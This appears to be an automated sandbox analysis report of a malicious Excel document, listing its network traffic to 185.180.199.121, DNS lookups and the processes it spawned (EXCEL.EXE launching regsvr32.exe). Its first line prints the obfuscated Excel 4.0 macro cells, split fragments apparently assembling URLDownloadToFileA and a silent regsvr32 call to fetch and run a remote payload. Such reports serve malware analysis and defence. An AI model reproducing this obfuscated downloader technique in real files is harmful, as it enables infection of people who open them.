,,FileA,,,,,,,,,,,,,,,,,,,,=EXEC(before.3.13.47.sheet!BG59&before.3.13.47.sheet!BG60&before.3.13.47.sheet!BF23&Sheet1!BH41),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,"=RIGHT(""FDFGFDhfjhjhfjfgjUR"",2)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""2 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownlo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,adTo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,J,J,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,regs,,,,,,,,,,,,,,,,,vr3,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 23, 2021 17:15:23.542834044 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.121 |
Jun 23, 2021 17:15:26.549690962 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.121 |
Jun 23, 2021 17:15:32.661571026 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.121 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 23, 2021 17:15:06.121184111 CEST | 64646 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:06.185915947 CEST | 53 | 64646 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:06.718322992 CEST | 65298 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:06.795903921 CEST | 53 | 65298 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:06.873821020 CEST | 59123 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:06.931394100 CEST | 53 | 59123 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:07.123950005 CEST | 54531 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:07.170205116 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:08.130825043 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:08.194817066 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:09.283163071 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:09.329155922 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:09.618675947 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:09.678569078 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:10.556751966 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:10.607285023 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:11.958971024 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:12.013883114 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:13.115807056 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:13.170995951 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:18.221193075 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:18.267995119 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:19.737098932 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:19.827260971 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:19.890693903 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:19.951225996 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:20.205254078 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:20.287142992 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:21.247226000 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:21.308686018 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:21.408472061 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:21.463419914 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:22.286027908 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:22.347326994 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:23.603409052 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:23.649513960 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:24.286133051 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:24.367368937 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:24.449513912 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:24.512372017 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:25.646636009 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:25.695976973 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:26.830100060 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:26.876440048 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:28.333570004 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:28.381264925 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:28.387031078 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:28.442106009 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:29.908272028 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:29.954631090 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:31.781655073 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:31.833534002 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:32.596698999 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:32.652005911 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:33.857270956 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:33.916964054 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:34.882993937 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:34.929752111 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:35.695528984 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:35.747733116 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:40.779616117 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:40.837507963 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:00.890558004 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:01.126925945 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:01.807156086 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:01.928209066 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:01.956259966 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:02.004961967 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:02.082015991 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:02.156074047 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:02.620239973 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:02.688443899 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:03.309227943 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:03.369302988 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:03.978740931 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:04.052093029 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:04.663188934 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:04.724107981 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:05.235652924 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:05.295393944 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:06.113240957 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:06.159359932 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:07.438272953 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:07.506975889 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:08.171327114 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:08.231159925 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:15.274323940 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:15.337285995 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:15.428447962 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:15.486848116 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:19.999152899 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:20.061496019 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:49.556658983 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:49.620614052 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:53.546560049 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:53.628006935 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4 |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 17:16:17 |
Start date: | 23/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x9f0000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:16:43 |
Start date: | 23/06/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x9d0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|